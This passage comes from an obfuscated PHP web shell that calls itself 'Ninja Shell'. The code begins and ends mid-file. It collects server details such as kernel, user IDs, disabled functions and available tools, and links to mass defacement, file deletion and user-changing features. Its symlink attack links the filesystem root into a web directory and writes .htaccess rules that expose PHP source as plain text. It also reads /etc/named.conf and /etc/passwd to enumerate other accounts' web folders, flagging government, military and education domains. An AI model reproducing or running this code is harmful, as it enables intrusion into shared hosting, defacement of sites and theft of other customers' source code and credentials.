"\xa\x9\11\x9\123\145\x72\166\145\x72\x20\111\x50\40\11\11\11\11\x3a\40" . $_SERVER["\x53\105\122\126\x45\x52\137\101\x44\104\122"] . "\x20\x59\x6f\165\162\x20\x49\x50\x20\x3a\40" . $_SERVER["\122\105\x4d\117\x54\105\137\x41\104\x44\122"] . "\12\x9\11\x9\113\x65\x72\156\145\x6c\40\126\145\x72\x73\x69\157\156\x20\11\x9\11\x3a\40" . php_uname() . "\xa\x9\x9\11\x53\157\146\x74\167\141\162\x65\40\11\x9\x9\x9\x9\72\40" . $_SERVER["\123\x45\122\126\x45\x52\137\123\117\106\x54\127\x41\x52\x45"] . "\xa\x9\x9\x9\x53\x74\x6f\162\x61\147\145\x20\123\160\x61\143\x65\40\x9\11\11\x3a\40" . $used . "\57" . $total . "\50\106\x72\x65\145\x20\x3a\x20" . $freespace . "\x29" . "\xa\x9\x9\11\x55\x73\x65\162\x20\x2f\40\107\x72\x6f\165\160\40\x9\11\11\x9\x3a\x20" . $user . "\40\x28" . $uid . "\51\x20\x7c\40" . $group . "\40\50" . $gid . "\51\x20\12\11\x9\11\x54\151\155\x65\x20\x4f\x6e\40\x53\x65\x72\x76\x65\x72\x20\11\x9\11\72\x20" . date("\x64\40\115\x20\x59\40\150\72\151\x3a\163\40\x61") . "\xa\x9\x9\11\104\151\x73\141\x62\154\x65\40\x46\165\x6e\143\164\x69\157\156\163\40\11\x9\x9\72\x20" . $show_ds . "\12\x9\x9\x9\123\x61\x66\x65\x20\115\x6f\144\x65\x20\x9\x9\11\11\72\x20" . $sm . "\xa\x9\x9\x9\x50\110\x50\40\126\x45\122\123\111\x4f\x4e\40\x9\11\x9\11\x3a\40" . phpversion() . "\40\117\156\40" . php_sapi_name() . "\xa\x9\x4f\x70\x65\x6e\137\102\x61\x73\145\144\151\x72\x20\72\40" . $show_obdir . "\x20\x7c\x20\x53\141\146\145\40\115\x6f\144\145\x20\105\170\x65\143\x20\x44\x69\162\40\x3a\x20" . $show_exec . "\40\x7c\x20\123\x61\146\145\x20\x4d\x6f\144\145\40\x49\156\143\x6c\x75\144\x65\40\104\151\x72\x20\x3a\40" . $show_include . "\xa\x9\x4d\171\x53\121\114\40\72\40" . $mysql . "\40\174\40\x4d\123\123\121\114\40\72\40" . $mssql . "\x20\x7c\x20\x50\x6f\163\x74\147\162\x65\x53\x51\114\40\x3a\40" . $pgsql . "\x20\x7c\x20\120\145\162\154\x20\x3a\x20" . $perl . "\40\x7c\40\x50\x79\x74\x68\x6f\156\40\x3a\40" . $python . "\x20\174\40\122\x75\x62\171\40\x3a\x20" . $ruby . "\40\174\x20\x20\x57\107\105\x54\x20\72\40" . $wget . "\x20\x7c\x20\143\125\x52\114\40\x3a\40" . $curl . "\x20\174\40\x4d\141\147\x69\x63\x20\121\165\157\x74\145\163\x20\x3a\x20" . $magicquotes . "\x20\x7c\40\x53\123\x48\x32\x20\72\x20" . $ssh2 . "\x20\x7c\x20\x4f\x72\x61\x63\x6c\145\40\x3a\40" . $oracle . "\x20\12\x9\x9\11\x9\x9\11\xa\x9\11\x9\11\11\x9\x3c\57\x74\145\170\x74\141\x72\x65\141\x3e\xa\11\11\x9\11\x9\11\x3c\57\x63\x65\156\164\145\x72\76"; } elseif (isset($_GET[hex("\x6d\x61\163\163")])) { echo "\x3c\150\162\x3e\12\x9\11\x9\x9\x9\11\x3c\x68\x32\76\74\x63\145\156\x74\145\x72\76\x4d\x61\x73\x73\40\x54\x6f\157\x6c\x73\40\x4e\x69\156\x6a\141\x20\123\x68\145\154\154\74\57\143\x65\x6e\x74\145\x72\x3e\74\57\150\62\x3e\xa\x9\11\x9\x9\x9\x9\x3c\x62\x72\x3e\12\x9\11\11\x9\x9\x9\x3c\x63\145\x6e\164\145\x72\76\12\11\11\x9\11\11\11\74\146\157\162\x6d\x20\155\145\x74\x68\157\x64\x20\x3d\40\47\x50\117\123\124\x27\76\12\x9\x9\x9\x9\x9\11\74\x64\x69\166\40\x63\x6c\141\x73\x73\x20\x3d\x20\47\x72\157\x77\x20\x63\x6c\x65\x61\x72\146\x69\170\47\76\xa\11\x9\x9\x9\x9\11\74\x64\x69\166\x20\x63\154\x61\x73\163\x20\x3d\40\47\x63\157\154\55\x6d\x64\x2d\x34\x27\x3e\xa\11\11\x9\11\x9\x9\x3c\x61\40\143\154\141\163\x73\40\75\x20\x27\x66\157\x72\x6d\55\143\157\x6e\x74\162\157\x6c\x20\x61\x6a\x78\47\x20\x68\x72\145\x66\x20\75\40\47\x3f\144\x3d" . hex($d) . "\x26" . hex("\155\141\x73\x73\x5f\164\x6f\x6f\154") . "\x27\x20\163\x74\x79\154\145\x3d\x27\x77\151\x64\x74\150\72\40\62\65\x30\160\x78\x3b\x27\40\x68\x65\x69\x67\x68\x74\x3d\47\x31\60\x27\76\x3c\143\x65\x6e\164\x65\x72\x3e\x4d\141\x73\x73\40\x44\x65\146\x61\x63\x65\40\57\40\104\145\x6c\145\164\x65\x20\x46\151\x6c\x65\163\x3c\x2f\x63\x65\156\164\145\162\76\74\57\141\76\12\11\x9\11\11\x9\x9\74\x2f\144\151\x76\x3e\12\x9\x9\x9\11\11\x9\x3c\x64\x69\166\40\143\154\141\x73\163\x20\x3d\40\x27\143\x6f\x6c\55\155\x64\55\x34\x27\76\xa\x9\x9\x9\x9\11\11\x3c\x61\40\143\x6c\x61\x73\163\40\x3d\40\x27\146\x6f\x72\155\55\143\157\x6e\x74\162\x6f\x6c\40\141\x6a\170\47\x20\150\162\x65\x66\x20\x3d\40\47\77\144\x3d" . hex($d) . "\46" . hex("\155\141\163\163\x5f\165\x73\145\x72") . "\47\x20\x73\164\x79\x6c\x65\75\x27\x77\151\x64\x74\x68\72\40\x32\x35\60\x70\x78\x3b\47\40\x68\145\151\x67\150\164\x3d\47\x31\60\47\76\x3c\143\145\x6e\164\145\162\76\x4d\x61\163\x73\x20\125\x73\145\x72\x20\103\150\x61\x6e\147\x65\x72\74\x2f\x63\x65\156\x74\145\162\x3e\74\57\x61\76\12\11\11\x9\x9\11\x9\74\57\x64\x69\166\76\xa\11\x9\x9\11\11\x9\x3c\144\x69\166\40\x63\154\141\x73\x73\x20\x3d\x20\47\x63\x6f\154\55\155\144\55\64\47\x3e\xa\x9\11\x9\x9\x9\11\74\x61\40\x63\154\x61\163\163\40\75\x20\47\x66\x6f\x72\x6d\x2d\143\157\156\164\162\157\x6c\x20\x61\152\170\47\x20\x68\162\145\x66\x20\75\x20\x27\77\144\x3d" . hex($d) . "\46" . hex("\155\141\x73\x73\137\x74\151\164\x6c\145") . "\47\x20\x73\x74\171\x6c\x65\x3d\47\x77\151\x64\x74\150\x3a\x20\x32\65\x30\x70\x78\x3b\x27\40\x68\145\x69\x67\150\x74\75\x27\x31\60\47\76\x3c\x63\145\156\164\145\x72\x3e\x4d\x61\x73\163\x20\124\151\164\x6c\145\40\103\x68\141\156\x67\x65\162\x3c\x2f\x63\x65\x6e\164\x65\162\76\x3c\57\141\76\12\11\x9\x9\11\11\x9\x3c\57\x64\x69\x76\x3e\xa\11\11\11\x9\x9\11\xa\x9\x9\x9\11\11\11\74\x2f\144\151\x76\76\74\57\146\x6f\x72\x6d\x3e\74\x2f\143\x65\156\164\145\162\x3e\74\150\162\76\74\x62\x72\76"; } elseif (isset($_GET[hex("\x73\x79\155\154\x69\156\x6b")])) { echo "\x3c\150\x72\x3e\74\142\x72\x3e"; echo "\x3c\143\x65\x6e\x74\x65\162\76\12\x9\11\11\11\x9\11\x3c\150\62\x3e\x20\123\x79\155\x6c\x69\156\153\40\x4e\151\x6e\152\x61\x20\x53\150\x65\x6c\154\x20\74\x2f\x68\x32\x3e\x20\x3c\x62\162\x3e\74\x62\x72\76\12\x9\x9\11\11\x9\x9\74\146\157\x72\155\x20\155\145\x74\x68\x6f\x64\x20\75\40\47\120\x4f\123\x54\47\x3e\xa\11\x9\x9\11\11\11\x3c\x64\151\166\40\x63\x6c\x61\x73\x73\x20\75\40\x27\162\x6f\x77\40\x63\x6c\x65\141\162\146\x69\170\x27\x3e\xa\x9\x9\x9\x9\11\11\74\x64\151\166\x20\143\154\x61\x73\163\x20\75\x20\47\x63\157\154\x2d\155\x64\55\x34\x27\x3e\xa\11\x9\11\x9\x9\11\x3c\151\x6e\x70\165\164\40\x74\171\160\x65\x20\75\x20\x27\163\x75\142\155\151\164\47\x20\x6e\141\155\x65\40\75\40\47\x73\x79\155\x6c\151\156\x6b\x27\x20\x63\154\141\163\163\40\75\x20\x27\x66\157\162\155\x2d\143\157\156\x74\162\x6f\x6c\47\x20\166\x61\154\165\145\40\75\40\47\123\171\x6d\x6c\x69\156\153\47\40\163\164\x79\154\x65\75\x27\x77\151\144\164\x68\x3a\40\62\65\60\160\170\73\x27\x20\x68\145\151\147\x68\164\x3d\x27\61\60\47\76\xa\11\x9\x9\x9\x9\11\x3c\x2f\x64\151\166\x3e\xa\11\11\11\x9\x9\x9\x3c\144\x69\x76\40\143\154\141\163\x73\x20\x3d\x20\47\143\x6f\x6c\x2d\x6d\x64\x2d\64\x27\76\12\11\x9\x9\x9\x9\x9\74\151\x6e\160\165\164\x20\164\x79\x70\x65\40\x3d\x20\47\163\165\142\x6d\x69\x74\x27\40\156\x61\x6d\145\x20\75\40\47\163\171\x6d\154\151\x6e\x6b\x32\x27\40\x63\154\x61\x73\x73\x20\75\x20\47\146\x6f\x72\155\55\x63\x6f\x6e\x74\x72\157\154\47\x20\x76\141\154\165\x65\40\75\x20\x27\123\x79\155\154\151\156\x6b\x20\62\x27\x20\x73\x74\171\x6c\x65\75\47\x77\x69\x64\164\x68\72\x20\62\x35\x30\x70\170\73\47\x20\150\145\x69\x67\x68\164\x3d\x27\61\60\47\76\xa\x9\x9\x9\11\x9\11\74\x2f\x64\151\x76\x3e\12\11\x9\11\x9\11\11\x3c\x64\151\166\x20\143\154\x61\163\163\40\75\x20\47\143\x6f\x6c\x2d\x6d\144\x2d\x34\47\x3e\xa\x9\11\x9\11\11\x9\74\x69\x6e\160\165\164\x20\x74\x79\160\x65\40\75\40\47\163\x75\142\155\151\x74\47\40\156\x61\x6d\x65\40\x3d\40\x27\x73\171\x6d\x6c\151\x6e\x6b\137\x70\171\x27\x20\143\x6c\x61\x73\163\x20\x3d\x20\47\x66\157\x72\155\55\143\x6f\156\x74\x72\157\x6c\x27\x20\x76\x61\x6c\165\145\x20\x3d\x20\47\123\171\155\x6c\151\x6e\x6b\x20\120\171\x74\150\157\x6e\47\x20\163\164\171\x6c\145\75\x27\x77\x69\x64\164\x68\x3a\40\x32\x35\60\160\170\x3b\x27\x20\150\145\151\x67\x68\164\x3d\47\61\60\x27\x3e\xa\x9\x9\x9\x9\11\11\x3c\57\x64\x69\166\x3e\xa\x9\11\11\11\x9\11\12\11\x9\x9\x9\11\x9\74\57\144\151\166\76\74\57\146\157\x72\155\76\x3c\57\143\x65\x6e\x74\145\x72\76\74\150\x72\x3e\74\142\162\76"; if (isset($_POST["\163\x79\155\154\x69\x6e\153"])) { @set_time_limit(0); echo "\x3c\x62\162\x3e\74\142\x72\x3e\x3c\143\x65\x6e\164\145\162\76\74\x68\x32\x3e\x53\x79\155\x6c\x69\x6e\153\x20\116\x69\156\x6a\141\40\x53\x68\x65\x6c\154\74\x2f\x68\x32\x3e\74\x2f\x63\145\x6e\164\x65\x72\76\74\142\162\x3e\74\x62\x72\76\x3c\x63\145\x6e\x74\145\x72\x3e\74\x64\151\166\40\143\154\x61\x73\x73\75\143\157\156\x74\145\x6e\x74\x3e"; @mkdir("\163\171\155", 511); $htaccess = "\117\x70\164\x69\x6f\156\163\40\x61\154\x6c\40\156\40\104\151\162\x65\x63\164\x6f\x72\x79\111\156\144\145\170\x20\123\165\x78\56\150\164\x6d\154\40\156\40\x41\x64\x64\124\171\160\x65\40\x74\x65\170\x74\57\160\154\141\x69\x6e\40\x2e\160\150\160\x20\x6e\40\x41\x64\144\110\x61\156\144\x6c\145\162\40\163\x65\162\166\x65\162\x2d\160\x61\x72\163\x65\x64\x20\56\x70\x68\x70\40\x6e\40\40\x41\x64\x64\x54\171\x70\145\40\x74\x65\170\x74\x2f\160\154\141\x69\156\x20\x2e\150\x74\x6d\x6c\x20\156\x20\x41\144\144\110\x61\156\144\154\x65\x72\x20\164\x78\164\x20\56\150\164\x6d\x6c\40\x6e\40\x52\145\161\165\151\x72\x65\x20\116\157\x6e\145\40\156\40\x53\x61\164\x69\x73\146\171\x20\x41\x6e\x79"; $write = @fopen("\x73\171\155\x2f\56\x68\x74\x61\x63\143\x65\163\163", "\167"); fwrite($write, $htaccess); @symlink("\57", "\163\171\155\x2f\x72\157\x6f\x74"); $filelocation = basename(__FILE__); $read_named_conf = @file("\x2f\x65\164\x63\x2f\156\141\x6d\145\x64\56\143\157\156\x66"); if (!$read_named_conf) { echo "\x3c\x70\162\x65\x20\143\x6c\141\163\163\x3d\155\154\61\x20\163\x74\x79\x6c\x65\75\47\155\x61\x72\x67\x69\x6e\55\164\x6f\160\72\65\160\x78\x27\x3e\x23\x20\103\x61\156\164\x20\x61\143\x63\x65\163\163\x20\x74\150\x69\163\x20\146\x69\154\x65\40\x6f\x6e\40\x73\x65\162\166\145\x72\40\x2d\76\40\x5b\x20\x2f\x65\164\x63\x2f\156\141\155\145\x64\x2e\x63\x6f\156\x66\x20\135\x3c\x2f\160\x72\145\x3e\x3c\x2f\x63\x65\x6e\x74\145\162\x3e"; } else { echo "\74\142\x72\76\74\x62\162\76\74\x64\x69\x76\x20\x63\x6c\x61\163\163\x3d\47\x74\155\160\47\76\74\x74\x61\x62\154\145\x20\x62\x6f\162\x64\x65\x72\75\47\61\47\40\142\157\162\x64\x65\162\x63\x6f\x6c\157\x72\x3d\x27\154\151\155\x65\47\40\167\x69\x64\164\150\75\x27\65\60\x30\47\x20\x63\x65\154\x6c\160\141\144\144\x69\156\x67\x3d\47\61\47\x20\143\145\x6c\x6c\163\x70\x61\143\x69\x6e\x67\75\47\x30\x27\76\x3c\x74\144\x3e\104\x6f\x6d\x61\151\156\163\74\57\x74\144\x3e\74\x74\144\76\125\163\145\162\x73\x3c\57\164\x64\x3e\x3c\164\144\x3e\163\171\155\154\151\156\x6b\x20\74\57\164\144\x3e"; foreach ($read_named_conf as $subject) { if (eregi("\172\x6f\156\x65", $subject)) { preg_match_all("\x23\x7a\157\156\145\x20\42\50\x2e\52\x29\x22\43", $subject, $string); flush(); if (strlen(trim($string[1][0])) > 2) { $UID = posix_getpwuid(@fileowner("\x2f\x65\164\x63\57\166\141\154\x69\141\x73\145\163\57" . $string[1][0])); $name = $UID["\x6e\141\155\x65"]; @symlink("\57", "\163\171\155\57\162\x6f\157\x74"); $name = $string[1][0]; $iran = "\56\x69\162"; $israel = "\56\x69\154"; $indo = "\x2e\151\x64"; $sg12 = "\56\x73\147"; $edu = "\x2e\x65\x64\x75"; $gov = "\x2e\147\x6f\166"; $gose = "\x2e\x67\157"; $gober = "\x2e\147\157\142"; $mil1 = "\56\155\151\154"; $mil2 = "\x2e\155\151"; $malay = "\56\x6d\171"; $china = "\56\x63\x6e"; $japan = "\56\x6a\x70"; $austr = "\x2e\141\x75"; $porn = "\x2e\x78\x78\170"; $as = "\56\165\x6b"; $calfn = "\x2e\x63\141"; if (eregi("{$iran}", $string[1][0]) or eregi("{$israel}", $string[1][0]) or eregi("{$indo}", $string[1][0]) or eregi("{$sg12}", $string[1][0]) or eregi("{$edu}", $string[1][0]) or eregi("{$gov}", $string[1][0]) or eregi("{$gose}", $string[1][0]) or eregi("{$gober}", $string[1][0]) or eregi("{$mil1}", $string[1][0]) or eregi("{$mil2}", $string[1][0]) or eregi("{$malay}", $string[1][0]) or eregi("{$china}", $string[1][0]) or eregi("{$japan}", $string[1][0]) or eregi("{$austr}", $string[1][0]) or eregi("{$porn}", $string[1][0]) or eregi("{$as}", $string[1][0]) or eregi("{$calfn}", $string[1][0])) { $name = "\74\x64\151\166\x20\x73\x74\x79\x6c\145\75\x27\40\x63\157\x6c\157\x72\x3a\40\x23\106\106\x30\x30\x30\60\40\73\x20\164\145\170\x74\x2d\x73\150\141\144\157\x77\x3a\40\60\x70\x78\40\x30\160\x78\x20\x31\160\170\x20\x72\x65\144\x3b\x20\47\76" . $string[1][0] . "\x3c\x2f\x64\151\166\76"; } echo "\12\x9\x9\x9\74\x74\162\76\xa\11\x9\x9\x3c\x74\144\76\xa\x9\11\11\74\144\x69\x76\x20\x63\x6c\141\163\163\x3d\x27\144\157\155\47\76\74\x61\x20\164\x61\162\147\145\x74\x3d\x27\137\142\154\x61\x6e\153\x27\40\x68\162\145\x66\75\x68\x74\164\x70\72\57\57\167\167\167\x2e" . $string[1][0] . "\57\x3e" . $name . "\x20\x3c\57\141\x3e\40\74\x2f\x64\x69\166\76\xa\x9\x9\11\74\57\164\144\x3e\xa\x9\x9\x9\x3c\164\144\x3e\12\11\x9\x9" . $UID["\x6e\141\x6d\145"] . "\xa\x9\x9\x9\74\57\x74\x64\x3e\xa\x9\x9\11\74\164\x64\76\12\x9\11\x9\74\x61\40\150\162\145\x66\75\x27\163\x79\155\57\162\x6f\x6f\164\x2f\x68\x6f\155\145\57" . $UID["\x6e\141\x6d\x65"] . "\57\x70\x75\142\x6c\151\143\137\x68\164\155\154\47\40\164\141\162\x67\x65\x74\x3d\47\137\x62\154\141\x6e\x6b\47\x3e\x53\x79\155\154\x69\x6e\153\40\74\x2f\x61\x3e\xa\11\11\x9\74\x2f\164\x64\76\xa\x9\x9\x9\x3c\57\x74\162\76\x3c\x2f\144\151\166\76\x20"; flush(); } } } } echo "\74\57\x63\145\156\164\x65\162\x3e\x3c\x2f\x74\141\142\x6c\145\x3e"; } elseif (isset($_POST["\x73\x79\155\154\151\156\x6b\x32"])) { $dir = path(); $full = str_replace($_SERVER["\104\117\x43\x55\115\x45\x4e\x54\x5f\122\x4f\x4f\x54"], '', $dir); $d0mains = @file("\57\145\164\x63\x2f\156\x61\x6d\x65\144\56\143\157\x6e\146"); if ($d0mains) { @mkdir("\x45\x78\143\x5f\163\171\155", 511); @chdir("\x45\170\x63\x5f\163\x79\155"); @exe("\x6c\156\40\55\163\40\x2f\x20\162\x6f\x6f\x74"); $file3 = "\117\x70\x74\151\x6f\x6e\x73\x20\111\x6e\x64\145\x78\x65\163\40\106\157\x6c\154\157\x77\123\x79\155\114\151\x6e\153\x73\12\x44\151\x72\x65\x63\x74\x6f\x72\x79\x49\156\x64\x65\170\x20\x45\170\x63\x2e\150\x74\x6d\xa\x41\x64\144\124\x79\x70\x65\40\164\145\x78\164\57\x70\x6c\141\x69\156\40\56\x70\x68\160\xa\x41\144\144\x48\x61\x6e\x64\154\x65\162\40\x74\x65\170\x74\x2f\x70\x6c\141\x69\x6e\x20\x2e\160\x68\160\xa\x53\x61\164\151\x73\x66\171\40\x41\156\171"; $fp3 = fopen("\x2e\x68\x74\141\x63\x63\145\x73\x73", "\x77"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa\74\x74\141\x62\154\x65\40\141\x6c\151\147\x6e\75\143\x65\x6e\164\145\x72\x20\142\157\x72\x64\145\x72\x3d\x31\40\x73\164\171\154\x65\x3d\47\167\151\144\164\150\x3a\66\x30\45\x3b\x62\157\x72\144\x65\162\55\143\157\x6c\x6f\x72\x3a\x23\63\63\63\x33\63\63\73\x27\x3e\xa\x3c\164\x72\x3e\12\x3c\164\x64\40\141\x6c\151\147\x6e\x3d\143\145\x6e\x74\145\162\x3e\74\146\157\156\164\40\x73\x69\x7a\x65\75\x32\76\123\56\40\x4e\x6f\x2e\x3c\x2f\x66\x6f\x6e\x74\76\74\57\164\144\76\xa\x3c\x74\x64\40\x61\x6c\151\x67\156\x3d\x63\145\156\164\x65\x72\76\74\x66\157\x6e\164\x20\163\151\172\x65\75\62\76\x44\x6f\155\x61\151\x6e\163\74\57\146\x6f\156\x74\x3e\x3c\x2f\164\x64\76\12\x3c\x74\x64\40\141\154\151\x67\156\75\x63\145\x6e\x74\x65\162\x3e\x3c\x66\x6f\x6e\164\40\163\151\172\145\x3d\62\x3e\125\163\x65\162\163\74\x2f\146\157\156\x74\x3e\x3c\57\x74\144\x3e\12\x3c\x74\x64\x20\141\154\151\x67\156\75\143\145\x6e\164\145\x72\x3e\74\146\157\156\x74\x20\x73\x69\x7a\x65\x3d\62\x3e\x53\171\155\154\x69\156\153\x3c\x2f\146\157\x6e\164\x3e\74\x2f\164\x64\76\12\x3c\x2f\x74\162\76"; $dcount = 1; foreach ($d0mains as $d0main) { if (eregi("\x7a\x6f\x6e\x65", $d0main)) { preg_match_all("\x23\172\157\x6e\145\40\x22\50\56\52\51\x22\x23", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("\57\145\x74\x63\57\166\141\x6c\151\141\x73\x65\x73\x2f" . $domains[1][0])); echo "\x3c\x74\162\40\x61\x6c\151\147\x6e\75\143\x65\x6e\x74\145\x72\76\x3c\164\x64\x3e\74\x66\157\156\x74\x20\163\x69\172\145\x3d\x32\x3e" . $dcount . "\x3c\x2f\146\x6f\156\x74\x3e\74\x2f\164\144\76\12\74\164\x64\40\x61\154\x69\147\x6e\x3d\154\145\x66\164\76\x3c\141\40\150\x72\x65\146\x3d\x68\x74\164\x70\x3a\x2f\57\x77\x77\167\x2e" . $domains[1][0] . "\x2f\76\x3c\x66\x6f\156\x74\40\x63\x6c\141\163\x73\x3d\x74\170\x74\x3e" . $domains[1][0] . "\x3c\x2f\146\x6f\x6e\x74\x3e\x3c\57\x61\x3e\x3c\57\x74\x64\x3e\xa\x3c\164\144\x3e" . $user["\156\x61\x6d\x65"] . "\x3c\57\x74\144\76\xa\74\x74\x64\76\74\x61\40\x68\x72\x65\146\x3d\x27{$full}\x2f\x45\x78\143\137\163\171\155\57\162\x6f\x6f\164\x2f\x68\157\155\x65\x2f" . $user["\156\x61\x6d\x65"] . "\57\160\x75\x62\154\151\143\x5f\150\164\155\x6c\x27\x20\x74\x61\x72\147\145\x74\x3d\47\x5f\x62\x6c\141\156\x6b\x27\x3e\x3c\x66\x6f\156\x74\40\x63\154\141\x73\163\75\x74\x78\164\76\x53\171\155\x6c\x69\156\153\x3c\x2f\x66\x6f\x6e\x74\76\74\x2f\141\76\74\x2f\164\144\x3e\x3c\x2f\164\162\x3e"; flush(); $dcount++; } } } echo "\x3c\x2f\x74\x61\x62\x6c\x65\x3e"; } else { $TEST = @file("\57\x65\164\143\57\x70\141\163\x73\167\144"); if ($TEST) { @mkdir("\105\170\143\137\163\x79\x6d", 511); @chdir("\x45\170\143\x5f\163\x79\x6d"); exe("\x6c\156\x20\55\163\x20\x2f\x20\x72\157\157\x74"); $file3 = "\117\160\x74\151\157\156\163\40\111\156\x64\145\170\x65\163\x20\106\157\x6c\x6c\157\x77\x53\171\155\x4c\x69\x6e\153\163\xa\104\x69\162\145\143\164\x6f\x72\171\111\156\144\x65\170\40\x45\170\143\56\150\164\x6d\12\x41\144\144\x54\171\x70\145\40\x74\x65\170\164\57\160\x6c\141\x69\x6e\40\56\160\x68\160\12\101\x64\144\x48\x61\156\144\x6c\x65\162\x20\x74\145\170\x74\57\x70\154\x61\x69\x6e\x20\x2e\x70\150\160\xa\x53\x61\164\151\x73\x66\171\40\x41\x6e\171"; $fp3 = fopen("\x2e\150\164\x61\143\143\x65\x73\x73", "\x77"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa\x20\x3c\164\x61\x62\x6c\x65\x20\x61\x6c\151\x67\156\75\143\x65\x6e\164\145\162\40\142\x6f\x72\144\145\162\75\x31\x3e\74\164\x72\x3e\xa\40\74\164\144\40\x61\154\151\x67\156\x3d\x63\x65\156\x74\145\x72\x3e\74\146\157\x6e\164\x20\x73\151\x7a\x65\x3d\x33\76\123\x2e\x20\116\157\x2e\x3c\x2f\146\x6f\156\164\76\74\x2f\164\144\76\xa\x20\x3c\164\x64\x20\x61\154\151\147\156\x3d\x63\145\156\x74\145\x72\x3e\74\x66\x6f\156\x74\40\163\151\x7a\x65\x3d\63\76\125\x73\x65\x72\163\x3c\57\x66\157\156\164\76\74\x2f\164\144\x3e\12\x20\x3c\164\x64\x20\141\154\151\x67\156\75\143\145\x6e\164\145\162\76\74\x66\157\x6e\164\x20\x73\x69\x7a\145\x3d\x33\76\123\x79\x6d\154\151\156\153\74\57\146\x6f\x6e\x74\76\x3c\57\x74\144\76\74\x2f\164\162\x3e"; $dcount = 1; $file = fopen("\57\145\x74\143\57\160\x61\163\x73\x77\x64", "\162") or die("\125\156\x61\x62\154\145\x20\x74\x6f\40\157\x70\x65\156\40\x66\x69\x6c\x65\x21"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match("\57\x5c\57\50\x2e\52\77\x29\x5c\72\134\x2f\57\x73", $s, $matches); $matches = str_replace("\x68\157\x6d\x65\57", '', $matches[1]); if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "\x62\151\x6e" || $matches == "\x65\164\143\x2f\x58\x31\x31\57\x66\163" || $matches == "\166\141\x72\57\154\x69\x62\57\x6e\x66\x73" || $matches == "\166\141\x72\x2f\141\162\x70\x77\141\164\x63\150" || $matches == "\166\x61\162\x2f\x67\157\160\150\145\162" || $matches == "\x73\x62\151\156" || $matches == "\x76\141\162\57\141\144\155" || $matches == "\x75\163\162\57\147\x61\155\x65\x73" || $matches == "\x76\141\x72\x2f\x66\x74\160" || $matches == "\145\x74\143\x2f\156\164\x70" || $matches == "\166\141\x72\x2f\x77\x77\167" || $matches == "\x76\x61\162\57\156\141\155\x65\x64") { continue; } echo "\x3c\164\x72\x3e\x3c\x74\x64\x20\141\x6c\151\x67\x6e\x3d\x63\145\x6e\x74\x65\162\x3e\74\146\x6f\x6e\x74\40\x73\151\x7a\145\x3d\62\x3e" . $dcount . "\74\57\164\144\x3e\xa\x20\74\x74\144\x20\141\x6c\151\147\156\75\x63\145\x6e\164\x65\x72\x3e\74\x66\x6f\156\164\40\x63\154\141\x73\x73\x3d\164\170\164\76" . $matches . "\x3c\x2f\164\x64\x3e"; echo "\74\x74\144\40\141\154\151\147\x6e\75\x63\145\x6e\x74\x65\162\76\x3c\x66\x6f\x6e\x74\40\143\154\x61\x73\163\75\x74\170\x74\76\x3c\141\40\150\162\145\x66\75{$full}\57\x45\170\x63\x5f\x73\x79\155\x2f\x72\157\157\164\57\150\157\155\145\57" . $matches . "\57\x70\x75\x62\x6c\151\x63\x5f\x68\164\x6d\x6c\40\x74\141\x72\147\x65\x74\x3d\47\137\142\x6c\141\x6e\153\47\76\123\x79\155\154\x69\x6e\x6b\x3c\x2f\141\76\74\57\x74\x64\76\74\x2f\164\162\76"; $dcount++; } fclose($file); echo "\x3c\x2f\x74\x61\x62\154\x65\x3e"; } else { if ($os != "\x57\x69\x6e\x64\157\x77\x73") { @mkdir("\x45\170\143\x5f\163\x79\x6d", 511); @chdir("\x45\x78\x63\x5f\x73\x79\x6d"); @exe("\x6c\156\x20\x2d\x73\40\x2f\40\x72\x6f\157\164"); $file3 = "\xa\x20\117\x70\x74\x69\157\156\x73\40\111\x6e\x64\x65\x78\145\163\40\x46\x6f\x6c\x6c\157\167\x53\x79\155\x4c\x69\156\153\163\xa\x44\x69\162\145\x63\164\x6f\x72\171\111\156\x64\145\x78\40\105\170\x63\x2e\x68\164\x6d\xa\x41\x64\144\x54\171\160\x65\40\x74\145\170\x74\57\160\154\141\151\x6e\x20\x2e\x70\150\160\xa\101\144\x64\x48\141\x6e\x64\154\145\162\x20\x74\x65\x78\164\57\x70\x6c\141\151\156\40\56\160\x68\160\xa\x53\141\x74\x69\163\146\171\x20\x41\x6e\171\xa"; $fp3 = fopen("\x2e\150\164\x61\143\x63\x65\163\163", "\x77"); $fw3 = fwrite($fp3, $file3); @fclose($fp3); echo "\xa\x20\x3c\x68\62\76\74\143\x65\x6e\164\145\x72\76\123\171\x6d\154\151\156\x6b\x32\x20\116\x69\x6e\152\x61\x20\x53\150\145\x6c\x6c\74\57\x63\x65\x6e\x74\x65\162\x3e\x3c\x2f\x68\x32\x3e\12\40\x3c\164\x61\x62\154\145\40\141\154\151\x67\x6e\x3d\143\x65\156\x74\x65\162\x20\142\x6f\162\x64\145\162\75\x31\76\x3c\x74\162\x3e\12\40\x3c\x74\144\40\x61\154\x69\x67\x6e\x3d\x63\x65\156\x74\145\x72\x3e\74\146\157\156\164\40\x73\151\172\x65\x3d\x33\76\x49\x44\x3c\57\x66\x6f\x6e\164\x3e\74\x2f\164\x64\76\12\x20\x3c\164\144\40\141\154\x69\x67\x6e\x3d\143\145\x6e\x74\145\162\76\x3c\x66\x6f\x6e\x74\40\163\x69\x7a\145\75\x33\x3e\x55\163\145\162\163\74\57\x66\157\156\x74\x3e\74\x2f\x74\x64\x3e\xa\40\x3c\x74\144\x20\x61\x6c\x69\147\156\75\143\145\156\164\x65\x72\76\x3c\146\157\156\164\40\x73\151\172\145\75\63\76\x53\x79\155\154\151\156\x6b\74\x2f\x66\x6f\x6e\164\x3e\74\57\x74\144\76\x3c\x2f\164\162\x3e"; $temp = ''; $val1 = 0; $val2 = 1000; for (; $val1 <= $val2; $val1++) { $uid = @posix_getpwuid($val1); if ($uid) { $temp .= join("\x3a", $uid) . "\12"; } } echo "\74\x62\162\x2f\76"; $temp = trim($temp); $file5 = fopen("\164\145\163\x74\x2e\164\x78\164", "\167"); fputs($file5, $temp); fclose($file5); $dcount = 1; $file = fopen("\164\x65\x73\x74\56\x74\170\x74", "\x72") or die("\125\156\141\142\x6c\145\x20\x74\157\x20\x6f\160\x65\x6e\40\146\x69\154\145\41"); while (!feof($file)) { $s = fgets($file); $matches = array(); $t = 